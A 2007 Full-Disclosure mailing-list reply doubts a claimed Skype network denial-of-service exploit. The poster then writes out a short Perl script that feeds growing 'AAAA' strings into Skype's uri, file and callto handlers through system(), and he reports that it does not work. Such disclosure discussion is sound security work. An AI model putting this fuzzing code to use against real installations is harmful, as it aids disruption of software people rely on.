Date: Fri, 17 Aug 2007 13:48:39 +0200
From: ascii <ascii@...amail.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Skype Network Remote DoS Exploit

Valery Marchuk wrote:
> Hi all!
> On SecurityLab.ru forum an exploit code was published by an anonymous
> user. Reportedly it must have caused Skype massive disconnections
> today. The PoC uses standard Skype client to call to a specific
> number. This call causes denial of service of current Skype server and
> forces Skype to reconnect to another server. The new server also
> "freezes" and so on ... the entire network.
> Links: http://www.securitylab.ru/news/301422.php
> PoC: http://en.securitylab.ru/poc/301420.php

imho fake (the poc does nothing except looping forever, missing
execve(), exec() in place of system(), etc)

should be something like

#!/usr/bin/perl

for ($i=0;$i<(256*256);$i=$i+256) {
 # ctrl + q for fast quit from skype
 print "Try with $i\n";
 $eot='AAAA' x $i;
 $str="\"/home/p/bin/skype_static-1.4.0.74/skype\" \"/uri:$eot\"";
 #$str="\"/home/p/bin/skype_static-1.4.0.74/skype\" \"/file:$eot\"";
 #$str="\"/home/p/bin/skype_static-1.4.0.74/skype\" \"/callto:$eot\"";
 #$str="\"/home/l/bin/skype_static-latest/skype\" \"/uri:$eot\"";
 #$str="\"/usr/bin/skype\" \"/uri:$eot\"";
 #$str="\"C:\\Program Files\\Skype\\Phone\\Skype.exe\" \"/uri:$eot\"";
 #print($str);
 system($str);
}

uri is a legit skype protocol handler

0x2,"Classes\skype\shell\open\command", "", "%SystemDrive%\Program Files\Skype\Phone\Skype.exe" "/uri:%1"
0x1,"Classes\Skype.Content\Shell\Open\Command", "", "%SystemDrive%\Programs\Skype\Phone\Skype.exe" "/file:%1"
0x2,"Classes\callto\shell\open\command", "", "%SystemDrive%\Programs\Skype\Phone\Skype.exe" "/callto:%1"

but still doesn't work

Regards,
Francesco `ascii` Ongaro
http://www.ush.it/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
